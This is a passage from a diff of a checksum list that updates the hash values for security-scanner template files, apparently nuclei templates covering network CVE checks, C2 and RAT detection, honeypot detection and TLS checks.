-javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:f8bc428bb0e28c84dadb406e069c10040f7dcc14 -javascript/misconfiguration/smb/smb-anonymous-access.yaml:bbe77db4d0d3fc8c2064261d8924c0c72e10eab2 -javascript/misconfiguration/smb/smb-shares.yaml:8167b0169ed0f41469e5beec416961d598e4b4c0 -javascript/misconfiguration/smb/smb-signing-not-required.yaml:4fb9834ee7cdde65a8288ce004e0bca92eabbe0e +javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:a140275437d2cc011fa13f90ee99c9b2de5d9cb9 +javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:bee66331a72b0eb35a58a0b14a6e3e6bd4933038 +javascript/misconfiguration/smb/smb-anonymous-access.yaml:07d8f92eac12b27c9918e52fb9771350b903338a +javascript/misconfiguration/smb/smb-shares.yaml:85fd832b448df9faf76106042a39fcd2fa1886f5 +javascript/misconfiguration/smb/smb-signing-not-required.yaml:b9bf642d551eaa58c612c6eac86d5ae87bb2835f javascript/misconfiguration/ssh/ssh-cbc-mode-ciphers.yaml:cc5d0034e363156cfcb6efe1b982fae8f2d0fdd1 javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa047b0c844faaeadb9580b javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/udp/detection/tftp-detect.yaml:12a192c09d86b55b21e6e6635f6727895533ccc6 -network/backdoor/backdoored-zte.yaml:8e14a0eb85eabc5c88a0f6b84bea92c05c5ab74b -network/c2/darkcomet-trojan.yaml:d9f38fd96f88a82092c35253b7f16a09bc6677f5 -network/c2/darktrack-rat-trojan.yaml:ca83b39244e7129504139a3e08e0dd3a757f675b -network/c2/orcus-rat-trojan.yaml:a667fecbd0a66acb151bed4299a367e740d7cf16 -network/c2/xtremerat-trojan.yaml:b03bd5cfb9ccd28d2a238e90a9aa5c4b2fdfabf0 -network/cves/2001/CVE-2001-1473.yaml:c9c000f76929d0e642a715a74728e1b2a89c13b2 -network/cves/2011/CVE-2011-2523.yaml:359ca31c2acb1c7dd372f9a27186a5a23e674b52 -network/cves/2015/CVE-2015-3306.yaml:c58ad8c7d3c6677fef86d0f2cf1c0a315550414d -network/cves/2016/CVE-2016-2004.yaml:b372717216041aba908de4124daf3ee7430d9fb8 -network/cves/2016/CVE-2016-3510.yaml:6d22058063aad51a24ecc3b81ade6352d44b79a1 -network/cves/2017/CVE-2017-3881.yaml:6a2effa98ce8cc7ad7cb5ac1f99bc5a791c279b9 -network/cves/2017/CVE-2017-5645.yaml:94284c63ad85c789e7c50eea58e1c14bf7925e6d -network/cves/2018/CVE-2018-2628.yaml:0aa96c42e5c0efaae5fc19df9a444844f394d647 -network/cves/2018/CVE-2018-2893.yaml:056d383b23dcbebe6d37620bcb700d39cef67ca9 -network/cves/2020/CVE-2020-11981.yaml:49efa5ec672e97c5f91ed505cae9cb419006abcf -network/cves/2020/CVE-2020-1938.yaml:3b705d2de2ea24d4362e2d98f248f50e44258e9b -network/cves/2021/CVE-2021-44521.yaml:22675af6afc1d99436d4380c07161f00c91235eb -network/cves/2022/CVE-2022-0543.yaml:933aade66295892313a806498d895774018e9f3e -network/cves/2022/CVE-2022-24706.yaml:23dc3cc83af842976848ab41035ec41ad3e23d74 -network/cves/2022/CVE-2022-31793.yaml:246dc8c3fcaf361bbc930ff0a792889af022d414 -network/cves/2023/CVE-2023-33246.yaml:a398fb1f38df5b5556e5abe6794d513d30055149 -network/default-login/ftp-anonymous-login.yaml:e5add890c57776bdf38cce3f54a94cdb4c6a026a -network/default-login/ftp-weak-credentials.yaml:47efb67cbe3e720682e2299c21b42896ad5c9e29 -network/default-login/ldap-anonymous-login.yaml:3dd95847d107fc63d4c149dd02a91a0b3632a4af -network/detection/activemq-openwire-transport-detect.yaml:eca4ca49af7437d5fc5f57dda42aa1ab662e90d8 -network/detection/aix-websm-detect.yaml:89899e8c7ff56b8241d8bd76f688262e3814021f -network/detection/apache-activemq-detect.yaml:d9e710eb9ebcfb6434bdfacc4db5bfa9a2e33c20 -network/detection/aws-sftp-detect.yaml:125ec23e17b48bf1f02c75573f112965f8bbbf16 -network/detection/axigen-mail-server-detect.yaml:3f08c82c133821e777863d1515158fd85cd8cd6b -network/detection/bgp-detect.yaml:ab3891adfb5e2b5369ef6ea6efdf306db2205ec0 -network/detection/bitvise-ssh-detect.yaml:296dd186bac2035fa72662858736f01356381b00 -network/detection/bluecoat-telnet-proxy-detect.yaml:c258298575afa1d1e13fdc3a7baa6c4a47974922 -network/detection/cisco-finger-detect.yaml:bdd1449eedccd57523cccd65ada02b88897f4b04 -network/detection/clamav-detect.yaml:4ba90cd008a086e05210e8f6d944202241477b2f -network/detection/cql-native-transport.yaml:a220137e018bf3e34d3943a8e69513050b208913 -network/detection/detect-addpac-voip-gateway.yaml:c14220bea1c8d7c9ea9e0ab83657200f52e4a3ea -network/detection/detect-jabber-xmpp.yaml:e1d51679328d6faa65bc5f564748472cffbd52bb -network/detection/dotnet-remoting-service-detect.yaml:46460df3e46a2206814b03987d8106c8c0205092 -network/detection/esmtp-detect.yaml:2c840a1ca25d0611087541358353535c3d6899bd -network/detection/exim-detect.yaml:74bdba80483fd8412d08d14dad61cef1b172c9e6 -network/detection/expn-mail-detect.yaml:fa4afadb046bee536e18e34425f03ae7a7e4de2a -network/detection/finger-detect.yaml:c4efc7e1d5f445caff7015356636245c5c05213b -network/detection/gnu-inetutils-ftpd-detect.yaml:b9047246807cef992c713711c49316ce026213be -network/detection/gopher-detect.yaml:d074aee6bb2ca3e000dac830084719e1fd92408a -network/detection/ibm-d2b-database-server.yaml:821265dd83454fb166d6bcfd47edea5d880a982a -network/detection/imap-detect.yaml:c061296e4b0d118acb1e98de780cbb6fd8712d39 -network/detection/iplanet-imap-detect.yaml:b0ab8ab7d959e744e0edf2e6caa742d5247817d5 -network/detection/java-rmi-detect.yaml:4a3766c05729259e425ed9053d1c0c2d870ff4c6 -network/detection/microsoft-ftp-service.yaml:8ac016c354c4cbba1b7db781087f762ed7cb3f0b -network/detection/mikrotik-ftp-server-detect.yaml:d79eda08d15c11d6ffffaf9c9259f7cc57712b07 -network/detection/mikrotik-routeros-api.yaml:bdcd123505a3cb02cdf8d194969f447241eb9345 -network/detection/mongodb-detect.yaml:91e54ff6bff3eb7c73f93cd81302fc83b7b776c5 -network/detection/moveit-sftp-detect.yaml:5668668fe0774f1d34826c7b0a780ac75e4a31d5 -network/detection/msmq-detect.yaml:b0b53a066286fcf74c78f54599e19b210cb5911e -network/detection/mysql-detect.yaml:7749ba298c99d79c6f61c86a8d3212a6ac153dbe -network/detection/openssh-detect.yaml:5c6f9f7c5c918923323698d173d0bec6064a45df -network/detection/pgsql-detect.yaml:f1071058bc9e90739c2f3b26fae0c506b4925669 -network/detection/pop3-detect.yaml:8fef0e19974bb0b0b9abf0a18ab6489569de2a0c -network/detection/proftpd-server-detect.yaml:a48529c178713f1bf32cc75b113f6b61ce811881 -network/detection/rabbitmq-detect.yaml:f95efdbe1c12dd668b424e184deaf268ffb1b3e2 -network/detection/rdp-detect.yaml:444581f156d4ed47795930d9d90a63130d38777a -network/detection/redis-detect.yaml:87d0739d45af47dd33dc5f90358bb899b00233c1 -network/detection/riak-detect.yaml:933342a2e4e97cef11175882062bec50d81a7ae1 -network/detection/rpcbind-portmapper-detect.yaml:c25b72fcc75fe873a7da77bad61cf699cd44b734 -network/detection/rsyncd-service-detect.yaml:711ae78334a14a7f2f9cab127db2b3f40ce02366 -network/detection/rtsp-detect.yaml:a8f18fc5edaa5e36f3d22d237d8165e75622d30a -network/detection/sap-router.yaml:6a7c00f4a502a65b4c35d0ed75ab073fcffd335b -network/detection/smtp-detect.yaml:0a8e9170a85d8c3dff875ec526033e009fc0bcc6 -network/detection/sshd-dropbear-detect.yaml:15934fc8dd0963f2f28cea67378d4dce54578fbf -network/detection/starttls-mail-detect.yaml:a20c2b8a9ec603998da792ae93869c784c2bfbb5 -network/detection/teamspeak3-detect.yaml:ac2984532b01ae135deb721590729ba77660aef6 -network/detection/telnet-detect.yaml:0d4a44e50e71382c658cfbbd4418d05daa4604d9 -network/detection/totemomail-smtp-detect.yaml:00dc35509913204c643c3b3203855c2bd88ab837 -network/detection/vmware-authentication-daemon-detect.yaml:1fff73db9e46a9967a8c66e6f143a3456e34a47b -network/detection/vnc-service-detect.yaml:23bfea46815ffe054cf9e6ee8f779e197de8abfb -network/detection/weblogic-iiop-detect.yaml:9b0e7d73263047b22e33856a3ed4ee1b41fba5c1 -network/detection/weblogic-t3-detect.yaml:d5293b0b9c6e08667f909caad9d19ac81d24b740 -network/detection/wing-ftp-detect.yaml:a3a3e342e7aaf8353fae0937708542a43c254493 -network/detection/ws_ftp-ssh-detect.yaml:afa64085926dc1a7ae1f565c2178a7504288b8dd -network/detection/xlight-ftp-service-detect.yaml:59b472e512f55fcdd88f7d2b8292cec016163140 -network/enumeration/beanstalk-service.yaml:214386c0f6168a7744dcda5876fa11e27e033087 -network/enumeration/kafka-topics-list.yaml:fe3a98cfe12efde6fe238fa87d334b81f7e2cf1d -network/enumeration/mongodb-info-enum.yaml:cc426d4b1b6f11861c589a5cf8c89932e4bce1f5 -network/enumeration/niagara-fox-info-enum.yaml:f7122469fbd276ff871f0e1cd8533afc256fa0bd -network/enumeration/psql-user-enum.yaml:9d40e07e03f9a4a6fdaeb84333d6d2789a3d435d -network/enumeration/smtp/smtp-commands-enum.yaml:ac8481da112d15e10d67a4bc54c5339257c8ad12 -network/enumeration/smtp/smtp-user-enum.yaml:998d62615f5ff17a125fd6842d6894fa9515f431 -network/exposures/cisco-smi-exposure.yaml:d38f6f2c289b2c163c50268ff0d60a25d78d3711 -network/exposures/exposed-adb.yaml:8ee3a9ce054580d35341f308bd1b8156fad2538b -network/exposures/exposed-dockerd.yaml:f0b4bb3907cc140818a95cb9530f8fa9165d3054 -network/exposures/exposed-redis.yaml:62355e9ddd20db13188c42afd020239fd5aa5e87 -network/exposures/exposed-zookeeper.yaml:d068ec4a948808c6d0a2f5f274b77f71d1f92a7a -network/honeypot/adbhoney-honeypot-cnxn-detect.yaml:236d4b5ddbd65bfce3700b25a20a951ef3123d86 -network/honeypot/adbhoney-honeypot-shell-detect.yaml:c78180decd140ed563965af72a563cbbfa739d85 -network/honeypot/conpot-siemens-honeypot-detect.yaml:2362deb4027b60cc1542efc1ea5110ddb0b3ac35 -network/honeypot/cowrie-ssh-honeypot-detect.yaml:1df4cfc95a9208b42fd6141baec3b04d71cf95e3 -network/honeypot/dionaea-ftp-honeypot-detect.yaml:752e07eaa8f32a73854278735b319618911647ae -network/honeypot/dionaea-mqtt-honeypot-detect.yaml:428c82a261659334ca7113aca828bf3e5cb308b2 -network/honeypot/dionaea-mysql-honeypot-detect.yaml:3fb3d162c16c772254310e5e91ba7426f3bce873 -network/honeypot/dionaea-smb-honeypot-detect.yaml:d7c6ef02bcaebbe3f73777516d786173705157f9 -network/honeypot/gaspot-honeypot-detect.yaml:e8f645bf0b290ff53fcad9c1e0ad44bed6cea11c -network/honeypot/mailoney-honeypot-detect.yaml:84d528d938a3d78143c5e43a76a383e471bf5d00 -network/honeypot/redis-honeypot-detect.yaml:df4b6b0299d5f8bfd5da632db536564f0e82f684 -network/jarm/c2/cobalt-strike-c2-jarm.yaml:ba5f43178189dff0b3809d22ca2074c29d2d28bc -network/jarm/c2/covenant-c2-jarm.yaml:e9ad69e2dbb7cd291a7a84ddb72beaa575a62833 -network/jarm/c2/deimos-c2-jarm.yaml:a36aec71fd9bd45d693bdff5b0c93ce8e0c863cd -network/jarm/c2/evilginx2-jarm.yaml:d2563a7d454766c3b47c8228cc8af917e4b89e26 -network/jarm/c2/generic-c2-jarm.yaml:ec45045ac7d881dbd80f47b00108028a79a3280d -network/jarm/c2/grat2-c2-jarm.yaml:0b6150544c6e31cb413736a4a2eb17f398623a4a -network/jarm/c2/havoc-c2-jarm.yaml:4028696845b5b853fce8224def4ef2043059f14c -network/jarm/c2/mac-c2-jarm.yaml:a182384a7f21636731e0bfe349bdcae51da7119f -network/jarm/c2/macshell-c2-jarm.yaml:8d5a96b05930d65e0018e2d3470a803e687c3551 -network/jarm/c2/merlin-c2-jarm.yaml:bd60da6a898f5a0421d8da3b8c94ee8338507dea -network/jarm/c2/metasploit-c2-jarm.yaml:624c80c46f0f9efebccc00b0a905dbe7a91b593a -network/jarm/c2/mythic-c2-jarm.yaml:a79ceb8da5117999640f4b7d088f33a4ec30cd78 -network/jarm/c2/posh-c2-jarm.yaml:bcbe5ccf88eb2f2c14257180ff50e6dae822f451 -network/jarm/c2/shad0w-c2-jarm.yaml:96cc8d2d739b5c24e04679e71b544065aa271fa0 -network/jarm/c2/silenttrinity-c2-jarm.yaml:fefcd54e7fe848894fac2e49f9d11016088a5b28 -network/jarm/c2/sliver-c2-jarm.yaml:de9750a325c98797f90f17ecd2392747c4bd8c76 -network/misconfig/apache-dubbo-unauth.yaml:2913b4a987fd8d01cc2b282a94ac74237e6281bc -network/misconfig/apache-rocketmq-broker-unauth.yaml:fa61f781c301bf536ef8fc7fe044fe65673997c8 -network/misconfig/clamav-unauth.yaml:43deefef3ed4b6dcb67fab12909660d10a18529c -network/misconfig/clickhouse-unauth.yaml:fb0050986d504f8fd20eea6dc2d585339490b12e -network/misconfig/erlang-daemon.yaml:6b590630f8a85b6edecd27e5f1ace6bcc9781872 -network/misconfig/ganglia-xml-grid-monitor.yaml:be8998a3e56d41513f71710963d8dcb49c4ea050 -network/misconfig/memcached-stats.yaml:c800e920c95ce582bfc3b4e910e4e12dfa2fdf76 -network/misconfig/mongodb-unauth.yaml:b227ce2969bf0aa6cba7714f0da64d7d95f2a769 -network/misconfig/mysql-native-password.yaml:0b06c0ad92c904ca5e0b38fb4184fcb737873c71 -network/misconfig/printers-info-leak.yaml:7040836a95d65dfd772be2ebb8176de844ea1f46 -network/misconfig/sap-router-info-leak.yaml:e81eb909bc647dfcb05f8f24ae9c13ae28f30b74 -network/misconfig/tidb-native-password.yaml:bc7dc91866a0f94f018ea9a1a1c0e5abb23b64b1 -network/misconfig/tidb-unauth.yaml:b7ac01510f169fc44fe1bfde8af63d0dbc1b85ef -network/misconfig/unauth-psql.yaml:84a413c87cbb6c8aa60ed9a06dd490b2dbee11cf -network/vulnerabilities/clockwatch-enterprise-rce.yaml:2dbd31cc1abd9e6076a76dc03d36f527d1868bbf -passive/cves/2024/CVE-2024-25723.yaml:eef08a5ff93f9eed38e2de65cfde62d397ed8e5d +javascript/udp/detection/tftp-detect.yaml:1647b2fd0d49cd31fc77c4580f12f29b37620ad5 +network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 +network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e +network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 +network/c2/orcus-rat-trojan.yaml:391539519819acb2999e30b98fbd9d789c6395ae +network/c2/xtremerat-trojan.yaml:151641a9689c4eb7ce5e61f3b54656c69afc7895 +network/cves/2001/CVE-2001-1473.yaml:febab57b73d417adcee7535327476a56b072adb4 +network/cves/2011/CVE-2011-2523.yaml:39eba544ecf40cd742e5042c18c9f28b07d73c58 +network/cves/2015/CVE-2015-3306.yaml:9f687f191fa20b97861ec04cb5acfe798248f611 +network/cves/2016/CVE-2016-2004.yaml:19c23411a63774a87b8e604d0bf08fe083eb1614 +network/cves/2016/CVE-2016-3510.yaml:f535d7959e2f7afcde395f448e5ea93d8e49fd6d +network/cves/2017/CVE-2017-3881.yaml:b814b5ded3051d4eaec01c4a486fac3ac4abffa7 +network/cves/2017/CVE-2017-5645.yaml:693cc474f86c8081efc4e66545dc41a046fe2a5a +network/cves/2018/CVE-2018-2628.yaml:c1e2d99c2938bf24dbc6d38523702fc408b1472a +network/cves/2018/CVE-2018-2893.yaml:379cdbf86b6ec09ae6a3235c2d36e98516b3ab3c +network/cves/2020/CVE-2020-11981.yaml:5e68d2bfbdd5a596df6b5b99b837cda61b90c45a +network/cves/2020/CVE-2020-1938.yaml:f7590bb89338cdd7e9d21975962428e01d4c3f4d +network/cves/2021/CVE-2021-44521.yaml:48737d9c170b73da76d4008b5fb9a4d219ab0a8f +network/cves/2022/CVE-2022-0543.yaml:cc5abf652c0eeb64ce1c6e9ceca8fb13142c812e +network/cves/2022/CVE-2022-24706.yaml:977a6263c91851c548388120854b62e51fce8132 +network/cves/2022/CVE-2022-31793.yaml:2db38ef9772fbdbc847e78407b959113ed41f359 +network/cves/2023/CVE-2023-33246.yaml:bd0b0fbc109f252476a8872e4e7e6e552d1b01e9 +network/default-login/ftp-anonymous-login.yaml:f08d36de58b3fa0aaad6faa31876e88adcca98f7 +network/default-login/ftp-weak-credentials.yaml:2893a5e523bf1853feeff9cf0f9ba74c1965bb59 +network/default-login/ldap-anonymous-login.yaml:a3dcae7c312b0f4f71b307a77bff88492af4ddf4 +network/detection/activemq-openwire-transport-detect.yaml:40c2853cd0ddbe1e8aebd1f2d225df2ba327f3ac +network/detection/aix-websm-detect.yaml:a3e9c8c897aab85eb396c9750ce3a2287599138a +network/detection/apache-activemq-detect.yaml:dec2762c13949f2fc4863ec24bf04b15f7cc47ed +network/detection/aws-sftp-detect.yaml:dee463f8da4f5e88a6392eb5223b461c5431f110 +network/detection/axigen-mail-server-detect.yaml:2b2c9204cf24ff8f631d4bfc7c47b3187612c737 +network/detection/bgp-detect.yaml:ba1808a76d8468c0470d60c31cd0b15cf4d38468 +network/detection/bitvise-ssh-detect.yaml:02185bc47bff5ab03b7eeda6146f8d9de2764157 +network/detection/bluecoat-telnet-proxy-detect.yaml:5a6eac7a1992ecbccf99afc8745fffa4ea3fc49a +network/detection/cisco-finger-detect.yaml:991a87350543ee99e79dedc541eb2f81b0de0278 +network/detection/clamav-detect.yaml:ffc68c9ffa3f0898f982cc0a029f1fb3af4a289e +network/detection/cql-native-transport.yaml:3204ee47002bea7600c26a1bf29af5c7e7348673 +network/detection/detect-addpac-voip-gateway.yaml:5256e1df6a32fe8e206ad0ff8f27edb18a45dcd8 +network/detection/detect-jabber-xmpp.yaml:e332205a81026c45b6f3d37e3e38b39074c5d2a5 +network/detection/dotnet-remoting-service-detect.yaml:d887c6261ed20ebd805b7f6b787b87a00f806cb7 +network/detection/esmtp-detect.yaml:d16617cc7bb28a801850e07b1cdf7971f6e13514 +network/detection/exim-detect.yaml:f5f8f5c59fa66d621369b3f1a69a1e4dde6aa541 +network/detection/expn-mail-detect.yaml:6cb4b5343fa440c63c2a79dfef011d309f5a0b2d +network/detection/finger-detect.yaml:cd9c883102f730d5dda2639bafc8e78255a46d5b +network/detection/gnu-inetutils-ftpd-detect.yaml:3b3ed46d099868003f86a7ec21d23afd5aeab315 +network/detection/gopher-detect.yaml:7ba964d0bbad631e157493ae982d5bab7fb2b8a9 +network/detection/ibm-d2b-database-server.yaml:e8e6b3cd3e138c5d9d562425c260a3ef63717432 +network/detection/imap-detect.yaml:759c7b8f654f3fde4d43b8dc6b40cdaebf588595 +network/detection/iplanet-imap-detect.yaml:10be4f42911f87a93fe4e0b192fcbf24c12565c4 +network/detection/java-rmi-detect.yaml:202bcdc6fc13b2561933d98e8cf75f5e917d7022 +network/detection/microsoft-ftp-service.yaml:5fc5a60ea61d8ff29b095a40b56f87abf66a9156 +network/detection/mikrotik-ftp-server-detect.yaml:7d148ba7b6af4f9fb78d22ce3ee05f5491cdf0ad +network/detection/mikrotik-routeros-api.yaml:6e99f2d3e5df1ac249846d83206f9eeb2732bbd3 +network/detection/mongodb-detect.yaml:35a026591de560092a2bd5d74f0a3eb50e9fda80 +network/detection/moveit-sftp-detect.yaml:234b9d11a7f66f35140c7c083b613a31f3a58dea +network/detection/msmq-detect.yaml:ba00026ecd1bd7b2a4faa69d374d4711603bd6b0 +network/detection/mysql-detect.yaml:ea919db7cc98d328a6fba5bccdf1ebe2b0aee176 +network/detection/openssh-detect.yaml:5249a2aab265ae22988fb48d3d9c9bedb77f03d4 +network/detection/pgsql-detect.yaml:cb480d2228bcf93b0b0b58e42ec369ba509ec92f +network/detection/pop3-detect.yaml:9d1b471a7d6a7ba7646922890849667c394e768f +network/detection/proftpd-server-detect.yaml:6f710a3f6c08071c244fc8dd90ad6a03d1bc1a16 +network/detection/rabbitmq-detect.yaml:50f513e665d63b796e18040a0571a3394a534bd1 +network/detection/rdp-detect.yaml:a03c1d0c7090db3307b1920b0d71cf2e37dc0316 +network/detection/redis-detect.yaml:e745a7e28d8a3b85387ea59588ca8ed5f8b4266e +network/detection/riak-detect.yaml:aa3499d97983e77e74bd48cc8481c42b0b62139a +network/detection/rpcbind-portmapper-detect.yaml:e99bde07dafc996b0e912335a745c1da1259f5c3 +network/detection/rsyncd-service-detect.yaml:417287aa090567e31844acff73e57d8626e884d4 +network/detection/rtsp-detect.yaml:c5364d5a1a3eedfaa6ab1138e0695e93d46943eb +network/detection/sap-router.yaml:e35fee6ad15c0a5ebfe677fdf3339a3d21de827d +network/detection/smtp-detect.yaml:b7d2bf5d18e2bee151d1c64460f655cda4898efc +network/detection/sshd-dropbear-detect.yaml:f452f50ba06692640bb087d24b5bac66b199bb12 +network/detection/starttls-mail-detect.yaml:341867aaaa8cb8094019174d9b29837f990c0b29 +network/detection/teamspeak3-detect.yaml:c538131f40d6b6602b8d693751a56efcc5cd3677 +network/detection/telnet-detect.yaml:0f0ef7ec1a562a40e66764d9a1a3c2d65e12a9db +network/detection/totemomail-smtp-detect.yaml:0559ea168548572825324bedc2f619b596b2f932 +network/detection/vmware-authentication-daemon-detect.yaml:54791ccb77e44b5d2ff0d5d423f71cfa57fcb3bd +network/detection/vnc-service-detect.yaml:a1bed0235b19234629579ce2f2be5e08d9c28d25 +network/detection/weblogic-iiop-detect.yaml:39cff1334caca50e5aae251c21c98c50802879ff +network/detection/weblogic-t3-detect.yaml:74b2d9812a56e856258d2be39f049c97d1d3221e +network/detection/wing-ftp-detect.yaml:348ee17259fa914b2616136b6a957d4fb065fad0 +network/detection/ws_ftp-ssh-detect.yaml:ed6343cf51322aaa43abcd235f01064e11b76243 +network/detection/xlight-ftp-service-detect.yaml:0f71e841dfea0daaa4c5c812b31561f88f010c60 +network/enumeration/beanstalk-service.yaml:23e58a3417399f49be9f3490eb74e5bf27bc3420 +network/enumeration/kafka-topics-list.yaml:ed82c8cd5749c2e11d2e6bf3dd14d2270371b9c0 +network/enumeration/mongodb-info-enum.yaml:d30bc0bc233e5e5f8c50a6c5b7f5eeb9415eb859 +network/enumeration/niagara-fox-info-enum.yaml:971dad0b0bd60622a27c34ece193af950e7de0ca +network/enumeration/psql-user-enum.yaml:11ed8a883efb26e10d4a71f80927d15c660cd9fb +network/enumeration/smtp/smtp-commands-enum.yaml:5c3444d5cb6006065c9daa5d28ce1a44f9bd2438 +network/enumeration/smtp/smtp-user-enum.yaml:2a745853559c86b1ee8e155b66ba157fc3a582f0 +network/exposures/cisco-smi-exposure.yaml:17aeb33e1300f54d6de53c8ea5bc1d522787e19b +network/exposures/exposed-adb.yaml:6ec9d27ca1d314027bd0c42897a8c5c4291889e5 +network/exposures/exposed-dockerd.yaml:a755ec0f108e11340a564d87acadd8214444bdc9 +network/exposures/exposed-redis.yaml:f4545bf447c5873ffaa86f6742d3b27e831cf11e +network/exposures/exposed-zookeeper.yaml:2cc1d74ca1073237c1b5220718622b802ef623cc +network/honeypot/adbhoney-honeypot-cnxn-detect.yaml:02da214331f613696f0d2ff671fb4bf21cd40858 +network/honeypot/adbhoney-honeypot-shell-detect.yaml:02c6e00a7168e80e0d65347ad4be85b9a1982754 +network/honeypot/conpot-siemens-honeypot-detect.yaml:07748e636b5f416d70cfd938ee8ad16818e4efc0 +network/honeypot/cowrie-ssh-honeypot-detect.yaml:4d654c1ec7023742bcd3a5bce29b2d668e4c2879 +network/honeypot/dionaea-ftp-honeypot-detect.yaml:651522cf56634cb32a8d5cf1e206305c958d8c57 +network/honeypot/dionaea-mqtt-honeypot-detect.yaml:96ac0a6823d22d6171c7a52982edb813f386e59c +network/honeypot/dionaea-mysql-honeypot-detect.yaml:ce252e86d31e3e563138fea8795bcd84fa3b15cc +network/honeypot/dionaea-smb-honeypot-detect.yaml:e15da90e8139f75160a420602e884492ce74fe83 +network/honeypot/gaspot-honeypot-detect.yaml:eb4f035bab895bf00069e272e7e6e36b8c817001 +network/honeypot/mailoney-honeypot-detect.yaml:0e8260604c4c2bda88ae34eb18c7c793971bad60 +network/honeypot/redis-honeypot-detect.yaml:6349a4ce928528499fca05a9a924f5206a4441c1 +network/jarm/c2/cobalt-strike-c2-jarm.yaml:83d8df0f6ccf58c716871b36f09a7067606c0fda +network/jarm/c2/covenant-c2-jarm.yaml:ce491ea87f6fd2ebc89d0feb3bdf34327777a175 +network/jarm/c2/deimos-c2-jarm.yaml:958972edaa695875f13328fd02ecbfb900a24fa0 +network/jarm/c2/evilginx2-jarm.yaml:561e18f1ab8d14e556c97192cf9bc5ca5c9811a7 +network/jarm/c2/generic-c2-jarm.yaml:5710693c1484a45f5566ef26ade41b2a21ab83aa +network/jarm/c2/grat2-c2-jarm.yaml:97303f1fd769fa994c058728aa3f08fcb605ea19 +network/jarm/c2/havoc-c2-jarm.yaml:1aca6a1a72245cdfab08a9eed95b16abcb8c7e8b +network/jarm/c2/mac-c2-jarm.yaml:8b0e8eb2240faeb0b059212601864d17074774d3 +network/jarm/c2/macshell-c2-jarm.yaml:fd2e92365036fafdaa1251926053b0310ce748ad +network/jarm/c2/merlin-c2-jarm.yaml:91ce6ea126260b1aaef40042054bae7031f7c096 +network/jarm/c2/metasploit-c2-jarm.yaml:98b5d14f40e3fe1112c43103fa7184f766a5a12a +network/jarm/c2/mythic-c2-jarm.yaml:1b456b7a557ac9af7a1407308a3e365160e482c9 +network/jarm/c2/posh-c2-jarm.yaml:ac7441edab93667f638d74e35bf6c849a9d91ce8 +network/jarm/c2/shad0w-c2-jarm.yaml:4d1586c8acebdc2dceb7c0858c7f8da9e9e3bde1 +network/jarm/c2/silenttrinity-c2-jarm.yaml:212dbc541af7c80d33278d5a7a32634e2c3f2ec5 +network/jarm/c2/sliver-c2-jarm.yaml:1574ea5653007dc8af04af1b5995959d81a71028 +network/misconfig/apache-dubbo-unauth.yaml:b6e1e322f4f1a2f294ae7bda52faeb3741f3dc20 +network/misconfig/apache-rocketmq-broker-unauth.yaml:96ec316e94d1f96fe8ae1b36eca852f4216eb5de +network/misconfig/clamav-unauth.yaml:9ed61d7d190601cf72783604495e5ed64a6c0eaa +network/misconfig/clickhouse-unauth.yaml:7dbb9e3bf22be6dea69a30e1a187174a678d517d +network/misconfig/erlang-daemon.yaml:dfea0e1f1276d41a1a6168a04398526583bf72ab +network/misconfig/ganglia-xml-grid-monitor.yaml:0a87d936ee73d97c8683aac45487193a4c533925 +network/misconfig/memcached-stats.yaml:692d9fe95924bbeb160920e4d56927a1e7d4e500 +network/misconfig/mongodb-unauth.yaml:9d0b68094488bf81be1a731dc88c53b399802276 +network/misconfig/mysql-native-password.yaml:76b320ca9ecfd2e943de3b8a56140e5fd2e85b71 +network/misconfig/printers-info-leak.yaml:3b4130d2c1e088f65b700b07126c26d80d16cf65 +network/misconfig/sap-router-info-leak.yaml:99ee4522aff2554fd90799be43c730c9dbe53e0c +network/misconfig/tidb-native-password.yaml:366aabeea75a8c6f5cbf99d8fdf4746e1c81d5a3 +network/misconfig/tidb-unauth.yaml:31f8d2286bd7557d53f7ff18011a9ec7732ca117 +network/misconfig/unauth-psql.yaml:321787e18e6164df765b26b771bd22606f3cd55d +network/vulnerabilities/clockwatch-enterprise-rce.yaml:1174218309884e2cc7b11eb461395217c3cf1e95 +passive/cves/2024/CVE-2024-25723.yaml:7eb36ba743582e6c04a324131d789035b7e6d72c profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc @@ -8617,9 +8617,9 @@ ssl/c2/orcus-rat-c2.yaml:dea15f4e0426ff409be1fc8ab06bfc43980982ef ssl/c2/posh-c2.yaml:fed2844484f59140ce7dd1713024ef81276f26b2 ssl/c2/quasar-rat-c2.yaml:c3bf40b6fd278294f273f10d6826f401cec3cb1f ssl/c2/shadowpad-c2.yaml:45b74e7a9adff29793a0efa5bfcf1afa3bcfeacd -ssl/c2/sliver-c2.yaml:ff173491e37fa64f306910ba9b09cca94340e169 -ssl/c2/venomrat.yaml:08aa0f900af87f9a9f844cf65512247224cd8a70 -ssl/deprecated-tls.yaml:924899ebe22708c890f47d7ef1edff2f5423a969 +ssl/c2/sliver-c2.yaml:5091f7c3f5f4cc5ce525d082fd7efeab5945dd5f +ssl/c2/venomrat.yaml:2630978f509982e5d0d1ec1720c43318c6d2cb0c +ssl/deprecated-tls.yaml:46a28bf73935984d149054138b1dc1666f1efb31 ssl/detect-ssl-issuer.yaml:3483faacc9cc303cac30d6c844bbe0a47c1d2e39 ssl/expired-ssl.yaml:a0c32548eb093d043f77f77eb905ac69e5d0e5b0 ssl/insecure-cipher-suite-detect.yaml:33ff0bbe66e06d4a01b13e40512e2838c9cf7f13 @@ -8632,7 +8632,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 